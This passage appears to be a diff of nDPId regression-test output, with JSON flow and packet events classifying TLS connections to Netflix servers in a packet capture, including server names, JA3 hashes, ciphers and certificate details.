-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1484319033259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033259,"pkt":"gCqoTGHM5JjWH70UCABFAAA0m4FAAEAG5U7AqAEHNCDEJM99AbszkZRh0pqER4AQEBVneAAAAQEICh9kuYW2m8Wo"} -00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033206,"flow_last_seen":1484319033261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319033261,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033206,"flow_last_seen":1484319033312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319033312,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":143,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033631,"flow_last_seen":1484319033631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319033631,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1484319033631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319033631,"pkt":"gCqoTGHM5JjWH70UCABFAABAVMpAAEAGIQjAqAEHNkXM8c9+AbvPvqpAAAAAALAC\/\/9MiwAAAgQFtAEDAwUBAQgKH2S67gAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1484319033678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033678,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGi7Y2RczxwKgBBwG7z36\/HDHnz76qQaASRepQUQAAAgQFtAQCCAqFp1CVH2S67gEDAwg="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1484319033680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033680,"pkt":"gCqoTGHM5JjWH70UCABFAAA0\/p1AAEAGd0DAqAEHNkXM8c9+AbvPvqpBvxwx6IAQEBW0wwAAAQEICh9kux6Fp1CV"} -00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033631,"flow_last_seen":1484319033681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1484319033681,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":148,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033631,"flow_last_seen":1484319033734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319033734,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01369{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319033631,"flow_last_seen":1484319033735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319033735,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032888,"flow_last_seen":1484319032888,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319032888,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1484319032888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319032888,"pkt":"gCqoTGHM5JjWH70UCABFAABA+AxAAEAGfcXAqAEHNkXM8c9xAbuJGKiDAAAAALAC\/\/+XvgAAAgQFtAEDAwUBAQgKH2S4KwAAAAAEAgAA"} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032896,"flow_last_seen":1484319032896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319032896,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1484319032896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319032896,"pkt":"gCqoTGHM5JjWH70UCABFAABADepAAEAGIy3AqAEHNr8RM896Abu7NDMxAAAAALAC\/\/+WKQAAAgQFtAEDAwUBAQgKH2S4MgAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1484319032934,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319032934,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGjLY2RczxwKgBBwG7z3E0MsEbiRiohKASReqX9AAAAgQFtAQCCAqFp0\/bH2S4KwEDAwg="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1484319032937,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319032937,"pkt":"gCqoTGHM5JjWH70UCABFAAA0mxZAAEAG2sfAqAEHNkXM8c9xAbuJGKiENDLBHIAQEBX8aAAAAQEICh9kuFmFp0\/b"} +00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032888,"flow_last_seen":1484319032938,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319032938,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"spdy\/3.1,spdy\/3,http\/1.1"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1484319032943,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319032943,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGR\/s2vxEzwKgBBwG7z3pSqS+duzQzMqASOJAFFAAAAgQFtAQCCAqtijmlH2S4MgEDAwg="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1484319032944,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319032944,"pkt":"gCqoTGHM5JjWH70UCABFAAA0cYhAAEAGv5rAqAEHNr8RM896Abu7NDMyUqkvnoAQEBVcLgAAAQEICh9kuGCtijml"} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032896,"flow_last_seen":1484319032959,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319032959,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032984,"flow_last_seen":1484319032984,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319032984,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1484319032984,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319032984,"pkt":"gCqoTGHM5JjWH70UCABFAABAh8JAAEAG+QHAqAEHNCDEJM97AbvHy0puAAAAALAC\/\/\/BrQAAAgQFtAEDAwUBAQgKH2S4hgAAAAAEAgAA"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032986,"flow_last_seen":1484319032986,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319032986,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1484319032986,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319032986,"pkt":"gCqoTGHM5JjWH70UCABFAABAdf5AAEAGCsbAqAEHNCDEJM98AbvweU0rAAAAALAC\/\/+WPwAAAgQFtAEDAwUBAQgKH2S4iAAAAAAEAgAA"} +00917{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032888,"flow_last_seen":1484319032990,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1484319032990,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"spdy\/3.1,spdy\/3,http\/1.1"}} +01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":20,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032888,"flow_last_seen":1484319032991,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1484319032991,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} +01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032896,"flow_last_seen":1484319033008,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319033008,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01356{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032896,"flow_last_seen":1484319033017,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319033017,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1484319033029,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033029,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGl6g0IMQkwKgBBwG7z3ve3c1cx8tKb6ASRepkbwAAAgQFtAQCCAq2m8VuH2S4hgEDAwg="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1484319033032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033032,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGlqg0IMQkwKgBBwG7z3xLWYWT8HlNLKASReoUTgAAAgQFtAQCCAq2m8VvH2S4iAEDAwg="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1484319033032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033032,"pkt":"gCqoTGHM5JjWH70UCABFAAA0rMBAAEAG1A\/AqAEHNCDEJM97AbvHy0pv3t3NXYAQEBXI5wAAAQEICh9kuLC2m8Vu"} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032984,"flow_last_seen":1484319033033,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319033033,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1484319033038,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033038,"pkt":"gCqoTGHM5JjWH70UCABFAAA0iIJAAEAG+E3AqAEHNCDEJM98AbvweU0sS1mFlIAQEBV4xgAAAQEICh9kuLK2m8Vv"} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032986,"flow_last_seen":1484319033038,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319033038,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032984,"flow_last_seen":1484319033086,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1484319033086,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032984,"flow_last_seen":1484319033087,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3128,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319033087,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 